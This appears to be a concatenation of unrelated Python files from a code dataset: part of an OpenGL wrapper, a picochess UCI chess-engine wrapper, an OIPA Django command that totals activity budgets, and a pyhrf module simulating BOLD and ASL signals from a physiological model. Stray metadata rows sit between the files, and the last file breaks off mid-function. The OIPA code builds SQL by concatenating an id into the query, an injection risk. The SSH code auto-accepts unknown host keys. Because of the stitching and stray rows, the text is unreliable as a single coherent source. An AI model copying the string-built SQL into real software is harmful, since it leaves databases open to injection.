return [command for command in self.commands if command.call_counter]
##############################################
def reset_call_counter(self):
for command in self.commands:
command.reset_call_counter()
####################################################################################################
class ErrorContextManager(object):
##############################################
def __init__(self, wrapper):
self._wrapper = wrapper
##############################################
def __enter__(self):
pass
##############################################
def __exit__(self, type_, value, traceback):
self._wrapper.check_error()
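# Hedged usage sketch (not part of the original module):
#
#     with wrapper.error_checker():
#         wrapper.glBindTexture(wrapper.GL_TEXTURE_2D, texture_id)
#
# check_error() runs when the block exits and raises NameError with a
# human-readable message if glGetError() reported anything.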
####################################################################################################
#
# End
#
####################################################################################################
|
gpl-3.0
| 1,990,613,322,482,558,700
| 36.606502
| 122
| 0.515397
| false
| 4.786672
| false
| false
| false
|
LocutusOfPenguin/picochess
|
uci/engine.py
|
1
|
9818
|
# Copyright (C) 2013-2018 Jean-Francois Romang (jromang@posteo.de)
# Shivkumar Shivaji ()
# Jürgen Précour (LocutusOfPenguin@posteo.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import configparser
import spur
import paramiko
from subprocess import DEVNULL
from dgt.api import Event
from utilities import EvtObserver
import chess.uci
from chess import Board
from uci.informer import Informer
from uci.read import read_engine_ini
class UciShell(object):
"""Handle the uci engine shell."""
def __init__(self, hostname=None, username=None, key_file=None, password=None):
super(UciShell, self).__init__()
if hostname:
logging.info('connecting to [%s]', hostname)
if key_file:
self.shell = spur.SshShell(hostname=hostname, username=username, private_key_file=key_file,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = spur.SshShell(hostname=hostname, username=username, password=password,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = None
def get_spur(self):
return self.shell
class UciEngine(object):
"""Handle the uci engine communication."""
def __init__(self, file: str, uci_shell: UciShell, home=''):
super(UciEngine, self).__init__()
try:
self.shell = uci_shell.get_spur()
if home:
file = home + os.sep + file
if self.shell:
self.engine = chess.uci.spur_spawn_engine(self.shell, [file])
else:
self.engine = chess.uci.popen_engine(file, stderr=DEVNULL)
self.file = file
if self.engine:
handler = Informer()
self.engine.info_handlers.append(handler)
self.engine.uci()
else:
logging.error('engine executable [%s] not found', file)
self.options = {}
self.future = None
self.show_best = True
self.res = None
self.level_support = False
self.installed_engines = read_engine_ini(self.shell, (file.rsplit(os.sep, 1))[0])
except OSError:
logging.exception('OS error in starting engine')
except TypeError:
logging.exception('engine executable not found')
def get_name(self):
"""Get engine name."""
return self.engine.name
def get_options(self):
"""Get engine options."""
return self.engine.options
def option(self, name, value):
"""Set OptionName with value."""
self.options[name] = value
def send(self):
"""Send options to engine."""
logging.debug('setting engine with options %s', self.options)
self.engine.setoption(self.options)
def has_levels(self):
"""Return engine level support."""
has_lv = self.has_skill_level() or self.has_handicap_level() or self.has_limit_strength() or self.has_strength()
return self.level_support or has_lv
def has_skill_level(self):
"""Return engine skill level support."""
return 'Skill Level' in self.engine.options
def has_handicap_level(self):
"""Return engine handicap level support."""
return 'Handicap Level' in self.engine.options
def has_limit_strength(self):
"""Return engine limit strength support."""
return 'UCI_LimitStrength' in self.engine.options
def has_strength(self):
"""Return engine strength support."""
return 'Strength' in self.engine.options
def has_chess960(self):
"""Return chess960 support."""
return 'UCI_Chess960' in self.engine.options
def has_ponder(self):
"""Return ponder support."""
return 'Ponder' in self.engine.options
def get_file(self):
"""Get File."""
return self.file
def get_installed_engines(self):
"""Get installed engines."""
return self.installed_engines
def position(self, game: Board):
"""Set position."""
self.engine.position(game)
def quit(self):
"""Quit engine."""
if self.engine.quit(): # Ask nicely
if self.engine.terminate(): # If you won't go nicely....
if self.engine.kill(): # Right that does it!
return False
return True
def uci(self):
"""Send start uci command."""
self.engine.uci()
def stop(self, show_best=False):
"""Stop engine."""
logging.info('show_best old: %s new: %s', self.show_best, show_best)
self.show_best = show_best
if self.is_waiting():
logging.info('engine already stopped')
return self.res
try:
self.engine.stop()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated')  # @todo find out why this can happen!
return self.future.result()
def go(self, time_dict: dict):
"""Go engine."""
self.show_best = True
time_dict['async_callback'] = self.callback
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def ponder(self):
"""Ponder engine."""
self.show_best = False
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(ponder=True, infinite=True, async_callback=self.callback)
return self.future
def brain(self, time_dict: dict):
"""Permanent brain."""
self.show_best = True
time_dict['ponder'] = True
time_dict['async_callback'] = self.callback3
# Observable.fire(Event.START_SEARCH())
self.future = self.engine.go(**time_dict)
return self.future
def hit(self):
"""Send a ponder hit."""
logging.info('show_best: %s', self.show_best)
self.engine.ponderhit()
self.show_best = True
def callback(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated')  # @todo find out why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def callback3(self, command):
"""Callback function."""
try:
self.res = command.result()
except chess.uci.EngineTerminatedException:
logging.error('Engine terminated')  # @todo find out why this can happen!
self.show_best = False
logging.info('res: %s', self.res)
# Observable.fire(Event.STOP_SEARCH())
if self.show_best and self.res:
EvtObserver.fire(Event.BEST_MOVE(move=self.res.bestmove, ponder=self.res.ponder, inbook=False))
else:
logging.info('event best_move not fired')
def is_thinking(self):
"""Engine thinking."""
return not self.engine.idle and not self.engine.pondering
def is_pondering(self):
"""Engine pondering."""
return not self.engine.idle and self.engine.pondering
def is_waiting(self):
"""Engine waiting."""
return self.engine.idle
def newgame(self, game: Board):
"""Engine sometimes need this to setup internal values."""
self.engine.ucinewgame()
self.engine.position(game)
def mode_send(self, ponder: bool, analyse: bool):
"""Set engine mode."""
self.option('Ponder', ponder)
self.option('UCI_AnalyseMode', analyse)
self.send()
def chess960_send(self, flag):
"""Send UCI_Chess960 flag to engine."""
if self.has_chess960():
self.option('UCI_Chess960', flag)
self.send()
def startup(self, options: dict, game: Board, new_game=True):
"""Startup engine."""
parser = configparser.ConfigParser()
parser.optionxform = str
if not options:
if self.shell is None:
success = parser.read(self.get_file() + '.uci')
else:
try:
with self.shell.open(self.get_file() + '.uci', 'r') as file:
parser.read_file(file)
success = True
except FileNotFoundError:
success = False
if success:
options = dict(parser[parser.sections().pop()])
self.level_support = bool(options)
self.options = options
self.chess960_send(game.has_chess960_castling_rights())
if new_game:
self.newgame(game)
logging.debug('Loaded engine [%s]', self.get_name())
logging.debug('Supported options [%s]', self.get_options())
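# A minimal usage sketch (not part of the original module; the engine path is
# an assumption for illustration):
#
# if __name__ == '__main__':
#     uci_shell = UciShell()  # no hostname -> run the engine locally
#     engine = UciEngine('/usr/games/stockfish', uci_shell)
#     game = Board()
#     engine.startup({}, game)  # also reads an optional <engine>.uci options file
#     engine.position(game)
#     engine.go({'movetime': 1000})  # fires Event.BEST_MOVE via the callback
#     engine.quit()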
|
gpl-3.0
| 5,526,358,255,197,360,000
| 33.321678
| 120
| 0.590261
| false
| 3.964459
| false
| false
| false
|
schlos/OIPA-V2.1
|
OIPA/iati/management/commands/total_budget_updater.py
|
1
|
1856
|
import datetime
# Django specific
from django.core.management.base import BaseCommand
from django.db import connection
from iati.models import Activity, Budget
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
option_list = BaseCommand.option_list
counter = 0
def handle(self, *args, **options):
parser = TotalBudgetUpdater()
parser.updateTotal()
class TotalBudgetUpdater():
def get_fields(self, cursor):
desc = cursor.description
results = [
dict(zip([col[0] for col in desc], row))
for row in cursor.fetchall()
]
return results
def update(self):
cursor = connection.cursor()
cursor.execute('SELECT activity_id, sum(value) as total_value FROM iati_budget b GROUP BY activity_id')
results = self.get_fields(cursor=cursor)
for r in results:
cur_act = Activity.objects.get(id=r['activity_id'])
cur_act.total_budget = r['total_value']
cur_act.save()
return True
def update_single_activity(self, id):
try:
    cursor = connection.cursor()
    # use a parameterized query to avoid SQL injection through the id value
    cursor.execute(
        "SELECT activity_id, sum(value) as total_value "
        "FROM iati_budget b "
        "WHERE activity_id = %s "
        "GROUP BY activity_id", [id])
    results = self.get_fields(cursor=cursor)
    for r in results:
        cur_act = Activity.objects.get(id=r['activity_id'])
        cur_act.total_budget = r['total_value']
        cur_act.save()
except Exception as e:
    logger.info("error in " + id + ", def: update_single_activity")
    if e.args:
        logger.info(e.args[0])
        if len(e.args) > 1:
            logger.info(e.args[1])
    message = getattr(e, 'message', None)  # 'message' only exists on Python 2 exceptions
    if message:
        logger.info(message)
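# Hedged usage note (not part of the original module): invoked through
# Django's management interface, e.g.
#
#     python manage.py total_budget_updater
#
# which recomputes Activity.total_budget from the summed Budget values.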
|
agpl-3.0
| 7,268,961,908,031,832,000
| 28.47619
| 147
| 0.587823
| false
| 3.982833
| false
| false
| false
|
philouc/pyhrf
|
python/pyhrf/sandbox/physio.py
|
1
|
30326
|
import os.path as op
import numpy as np
from pyhrf import Condition
from pyhrf.paradigm import Paradigm
from pyhrf.tools import Pipeline
import pyhrf.boldsynth.scenarios as simbase
PHY_PARAMS_FRISTON00 = {
'model_name' : 'Friston00',
'tau_s' : 1/.8,
'eps' : .5,
'eps_max': 10., #TODO: check this
'tau_m' : 1.,
'tau_f' : 1/.4,
'alpha_w' : .2,
'E0' : .8,
'V0' : .02,
'k1' : 7 * .8,
'k2' : 2.,
'k3' : 2 * .8 - .2}
PHY_PARAMS_FMRII = {
'model_name' : 'fmrii',
'tau_s' : 1/.65,
'eps' : 1.,
'eps_max': 10., #TODO: check this
'tau_m' : .98,
'tau_f' : 1/.41,
'alpha_w' : .5,
'E0' : .4,
'V0' : .01,}
PHY_PARAMS_KHALIDOV11 = {
'model_name' : 'Khalidov11',
'tau_s' : 1.54,
'eps' : .54,
'eps_max': 10., #TODO: check this
'tau_m' : 0.98,
'tau_f' : 2.46,
'alpha_w' : .33,
'E0' : .34,
'V0' : 1,
'k1' : 7 * .34,
'k2' : 2.,
'k3' : 2 * .34 - .2}
#TODO: Donnet, Deuneux
from scipy.stats import truncnorm
def create_tbg_neural_efficacies(physiological_params, condition_defs, labels):
"""
Create neural efficacies from a truncated bi-Gaussian mixture.
Args:
- physiological_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- condition_defs (list of pyhrf.Condition):
list of condition definitions. Each item should have the following
fields (moments of the mixture):
- m_act (0<=float<eff_max): mean of activating component
- v_act (0<float): variance of activating component
- v_inact (0<float): variance of non-activating component
- labels (np.array((nb_cond, nb_vox), int)): binary activation states
Return:
np.array(np.array((nb_cond, nb_vox), float))
-> the generated neural efficacies
TODO: settle how to relate brls and prls to neural efficacies
"""
eff_max = physiological_params['eps_max']
eff = []
for ic,c in enumerate(condition_defs):
labels_c = labels[ic]
mask_activ = np.where(labels_c)
eff_c = truncnorm.rvs(0, eff_max, loc=0., scale=c.v_inact**.5,
size=labels_c.size)
# truncnorm -> loc is mean, scale is std_dev
eff_c[mask_activ] = truncnorm.rvs(0, eff_max, loc=c.m_act,
scale=c.v_act**.5, size=labels_c.sum())
eff.append(eff_c)
return np.vstack(eff)
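def _example_tbg_neural_efficacies():
    """Hedged usage sketch (not part of the original API): sample neural
    efficacies for one condition over 4 voxels, half of them activating."""
    cond = [Condition(name='audio', m_act=10., v_act=.1, v_inact=.2,
                      label_map='tiny_1')]
    labels = np.array([[0, 0, 1, 1]])  # binary activation states
    return create_tbg_neural_efficacies(PHY_PARAMS_FRISTON00, cond, labels)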
def phy_integrate_euler(phy_params, tstep, stim, epsilon, Y0=None):
"""
Integrate the ODEs of the physiological model with the Euler method.
Args:
- phy_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- tstep (float): time step of the integration, in seconds.
- stim (np.array(nb_steps, float)): stimulation sequence with a temporal
resolution equal to the time step of the integration
- epsilon (float): neural efficacy
- Y0 (np.array(4, float) | None): initial values for the physiological
signals.
If None: [0, 1, 1, 1.]
s f_in v q
Result:
- np.array((4, nb_steps), float)
-> the integrated physiological signals, where indexes of the first
axis correspond to:
0 : flow inducing
1 : inflow
2 : blood volume
3 : HbR
TODO: should the output signals be rescaled wrt their value at rest?
"""
tau_s = phy_params['tau_s']
tau_f = phy_params['tau_f']
tau_m = phy_params['tau_m']
alpha_w = phy_params['alpha_w']
E0 = phy_params['E0']
def cpt_phy_model_deriv(y, s, epsi, dest):
N, f_in, v, q = y
if f_in < 0.:
#raise Exception('Negative f_in (%f) at t=%f' %(f_in, ti))
#HACK
print 'Warning: Negative f_in (%f) at t=%f' %(f_in, ti)
f_in = 1e-4
dest[0] = epsi*s - (N/tau_s)-((f_in - 1)/tau_f) #dNdt
dest[1] = N #dfidt
dest[2] = (1/tau_m)*(f_in-v**(1/alpha_w)) #dvdt
dest[3] = (1/tau_m)*((f_in/E0)*(1-(1-E0)**(1/f_in)) - \
(q/v)*(v**(1/alpha_w))) #dqdt
return dest
res = np.zeros((stim.size+1,4))
if Y0 is None: # 'Y0 or default' raises for Numpy arrays (ambiguous truth value)
    Y0 = np.array([0., 1., 1., 1.])
res[0,:] = Y0
for ti in xrange(1, stim.size+1):
cpt_phy_model_deriv(res[ti-1], stim[ti-1], epsilon, dest=res[ti])
res[ti] *= tstep
res[ti] += res[ti-1]
return res[1:,:].T
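def _example_phy_integrate_euler():
    """Hedged usage sketch (not part of the original API): integrate the
    Friston00 model for a 1 s stimulation block sampled every 50 ms."""
    tstep = .05
    stim = np.zeros(600)         # 30 s of input signal
    stim[:int(1. / tstep)] = 1.  # stimulus 'on' during the first second
    signals = phy_integrate_euler(PHY_PARAMS_FRISTON00, tstep, stim,
                                  epsilon=.5)
    flow_inducing, inflow, volume, hbr = signals  # axis order documented above
    return hbr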
def create_evoked_physio_signals(physiological_params, paradigm,
neural_efficacies, dt, integration_step=.05):
"""
Generate evoked hemodynamics signals by integrating a physiological model.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- paradigm (pyhrf.paradigm.Paradigm) :
the experimental paradigm
- neural_efficacies (np.ndarray (nb_conditions, nb_voxels, float)):
neural efficacies involved in flow inducing signal.
- dt (float):
temporal resolution of the output signals, in second
- integration_step (float):
time step used for integration, in second
Returns:
- np.array((nb_signals, nb_scans, nb_voxels), float)
-> All generated signals, indexes of the first axis correspond to:
- 0: flow inducing
- 1: inflow
- 2: blood volume
- 3: [HbR]
"""
#TODO: handle multiple conditions
# -> create input activity signal [0, 0, eff_c1, eff_c1, 0, 0, eff_c2, ...]
# for now, take only first condition
first_cond = paradigm.get_stimulus_names()[0]
stim = paradigm.get_rastered(integration_step)[first_cond][0]
neural_efficacies = neural_efficacies[0]
# response matrix initialization
integrated_vars = np.zeros((4, neural_efficacies.shape[0], stim.shape[0]))
for i, epsilon in enumerate(neural_efficacies):
integrated_vars[:,i,:] = phy_integrate_euler(physiological_params,
integration_step, stim,
epsilon)
#downsampling:
nb_scans = paradigm.get_rastered(dt)[first_cond][0].size
dsf = int(dt/integration_step)
return np.swapaxes(integrated_vars[:,:,::dsf][:,:,:nb_scans], 1, 2)
def create_bold_from_hbr_and_cbv(physiological_params, hbr, cbv):
"""
Compute BOLD signal from HbR and blood volume variations obtained
by a physiological model
"""
# physiological parameters
V0 = physiological_params['V0']
k1 = physiological_params['k1']
k2 = physiological_params['k2']
k3 = physiological_params['k3']
return V0 *( k1*(1-hbr) + k2*(1-hbr/cbv) + k3*(1-cbv) )
def create_physio_brf(physiological_params, response_dt=.5,
response_duration=25.,return_brf_q_v=False):
"""
Generate a BOLD response function by integrating a physiological model and
setting its driving input signal to a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the BRF (normalized)
- also returns the non-normalized brf, q and v when return_brf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]})
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
brf = create_bold_from_hbr_and_cbv(physiological_params, q[:,0], v[:,0])
if return_brf_q_v:
return brf/ (brf**2).sum()**.5, q, v
else:
return brf / (brf**2).sum()**.5
def create_physio_prf(physiological_params, response_dt=.5,
response_duration=25.,return_prf_q_v=False):
"""
Generate a perfusion response function by setting the input driving signal
of the given physiological model with a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the PRF
- also returns the non-normalized prf, q and v when return_prf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]}) # response_dt to match convention
# in JDE analysis
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
prf = f[:,0] - f[0,0] #remove y-intercept
if return_prf_q_v:
return prf/ (prf**2).sum()**.5, q, v
else:
return prf / (prf**2).sum()**.5
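def _example_physio_rfs():
    """Hedged usage sketch (not part of the original API): generate the
    normalized BRF/PRF pair predicted by the Friston00 parameter set."""
    dt = .5
    brf = create_physio_brf(PHY_PARAMS_FRISTON00, response_dt=dt)
    prf = create_physio_prf(PHY_PARAMS_FRISTON00, response_dt=dt)
    return brf, prf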
def rescale_bold_over_perf(bold_stim_induced, perf_stim_induced,
bold_perf_ratio=5.):
return bold_stim_induced/bold_stim_induced.max() * bold_perf_ratio * \
perf_stim_induced.max()
def create_asl_from_stim_induced(bold_stim_induced_rescaled, perf_stim_induced,
ctrl_tag_mat, dsf, perf_baseline, noise,
drift=None, outliers=None):
"""
Downsample stim_induced signal according to downsampling factor 'dsf' and
add noise and drift (nuisance signals), which have to be at the downsampled
temporal resolution.
"""
bold = bold_stim_induced_rescaled[0:-1:dsf,:].copy()
perf = np.dot(ctrl_tag_mat, (perf_stim_induced[0:-1:dsf,:].copy() + \
perf_baseline))
asl = bold + perf
if drift is not None:
asl += drift
if outliers is not None:
asl += outliers
asl += noise
return asl
def simulate_asl_full_physio(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
Generate ASL data by integrating a physiological dynamical system.
Args:
- output_dir (str|None): path where to save outputs as nifti files.
If None: no output files
- noise_scenario ("high_snr"|"low_snr"): scenario defining the SNR
- spatial_size ("tiny"|"normal") : scenario for the size of the map
- "tiny" produces 2x2 maps
- "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
TODO: use magnetization model to properly simulate final ASL signal
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', m_act=10., v_act=.1, v_inact=.2,
label_map=lmap1),
Condition(name='video', m_act=11., v_act=.11, v_inact=.21,
label_map=lmap2),
Condition(name='damier', m_act=12., v_act=.12, v_inact=.22,
label_map=lmap3),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap1),
Condition(name='video', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Neural efficacy
'neural_efficacies' : create_tbg_neural_efficacies,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Physiological model
'physiological_params' : PHY_PARAMS_FRISTON00,
('flow_induction','perf_stim_induced','cbv','hbr') :
create_evoked_physio_signals,
'bold_stim_induced' : create_bold_from_hbr_and_cbv,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs': simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
# ASL
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
# Perf baseline #should be the inflow at rest ... #TODO
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 0.,
'perf_baseline_var': 0.,
# maybe rename to ASL (should be also modified in JDE)#TODO
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
def simulate_asl_physio_rfs(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
Generate ASL data according to a LTI system, with PRF and BRF generated
from a physiological model.
Args:
- output_dir (str|None): path where to save outputs as nifti files.
If None: no output files
- noise_scenario ("high_snr"|"low_snr"): scenario defining the SNR
- spatial_size ("tiny"|"normal") : scenario for the size of the map
- "tiny" produces 2x2 maps
- "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', perf_m_act=5., perf_v_act=.1, perf_v_inact=.2,
bold_m_act=15., bold_v_act=.1, bold_v_inact=.2,
label_map=lmap1),
Condition(name='video', perf_m_act=5., perf_v_act=.11, perf_v_inact=.21,
bold_m_act=14., bold_v_act=.11, bold_v_inact=.21,
label_map=lmap2),
Condition(name='damier', perf_m_act=12.,
perf_v_act=.12, perf_v_inact=.22,
bold_m_act=20., bold_v_act=.12, bold_v_inact=.22,
label_map=lmap3),
]
elif noise_scenario == 'low_snr_low_prl':
v_noise = 7.
scale = .3
print 'noise_scenario: low_snr_low_prl'
conditions = [
Condition(name='audio', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
'rastered_paradigm' : simbase.rasterize_paradigm,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Physiological model (for generation of RFs)
'physiological_params' : PHY_PARAMS_FRISTON00,
# Brls
'brls' : simbase.create_time_invariant_gaussian_brls,
# Prls
'prls' : simbase.create_time_invariant_gaussian_prls,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Perf baseline
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 1.5,
'perf_baseline_var': .4,
# Stim induced
'bold_stim_induced' : simbase.create_bold_stim_induced_signal,
'perf_stim_induced' : simbase.create_perf_stim_induced_signal,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs':simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
# Bold # maybe rename as ASL (should be handled afterwards ...
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
#### Linearized system to characterize BRF - PRF relationship ####
# def buildOrder1FiniteDiffMatrix_central_alternate(size,dt):
# """
# returns a toeplitz matrix
# for central differences
# """
# #instability in the first few data points when calculating prf (not seen when old form is used)
# from scipy.linalg import toeplitz
# r = np.zeros(size)
# c = np.zeros(size)
# r[1] = .5
# r[size-1] = -.5
# c[1] = -.5
# c[size-1] = .5
# # to fix the last grid point
# D = toeplitz(r,c).T
# D[0,size-1]=0
# D[size-1,0]=0
# D[size-1,size-2]=-1
# D[size-1,size-1]=1
# return D/(2*dt)
def buildOrder1FiniteDiffMatrix_central(size,dt):
"""
returns a toeplitz matrix
for central differences
to correct for errors on the first and last points:
(due to the fact that there is no rf[-1] or rf[size] to average with)
- uses the last point to calcuate the first and vis-versa
- this is acceptable bc the rf is assumed to begin & end at steady state
(thus the first and last points should both be zero)
"""
from scipy.linalg import toeplitz
r = np.zeros(size)
c = np.zeros(size)
r[1] = .5
r[size-1] = -.5
c[1] = -.5
c[size-1] = .5
return toeplitz(r,c).T/(2*dt)
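def _example_finite_diff_matrix():
    """Hedged sketch (not part of the original API): apply the central
    difference operator to a sampled signal; D.dot(f) approximates df/dt
    with the wrap-around boundary treatment documented above."""
    dt = .05
    t = np.arange(0., 1., dt)
    f = np.sin(2 * np.pi * t)
    D = buildOrder1FiniteDiffMatrix_central(t.size, dt)
    return D.dot(f)  # approximately 2*pi*cos(2*pi*t) away from the edges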
def plot_calc_hrf(hrf1_simu, hrf1_simu_name, hrf1_calc, hrf1_calc_name,
hrf2_simu, hrf2_simu_name, dt):
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(hrf1_simu.size) * dt #TODO: find non-dt method to do this
simu1 = plt.plot(t, hrf1_simu, label=hrf1_simu_name)
calc1 = plt.plot(t, hrf1_calc, label=hrf1_calc_name)
plt.legend()
plt.title(hrf1_calc_name)
plt.subplot(122)
simu2 = plt.plot(t, hrf2_simu, label=hrf2_simu_name)
plt.plot(t, hrf1_simu, label=hrf1_simu_name)
plt.legend()
plt.title(hrf2_simu_name)
plt.show()
return None
def linear_rf_operator(rf_size, phy_params, dt, calculating_brf=False):
"""
Calculates the linear operator A needed to convert brf to prf & vice versa
prf = (A^{-1})brf
brf = (A)prf
Inputs:
- size of the prf and/or brf (assumed to be same)
- physiological parameters
- time resolution of the data
- whether you wish to calculate brf (returns A) or prf (returns the inverse of A)
Outputs:
- np.array of shape (rf_size, rf_size): the linear operator used to convert hrfs
"""
import numpy as np
tau_m_inv = 1./phy_params['tau_m']
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
from pyhrf.sandbox.physio import buildOrder1FiniteDiffMatrix_central
D = buildOrder1FiniteDiffMatrix_central(rf_size,dt) #numpy matrix
eye = np.matrix(np.eye(rf_size)) #numpy matrix
A3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*eye).I )
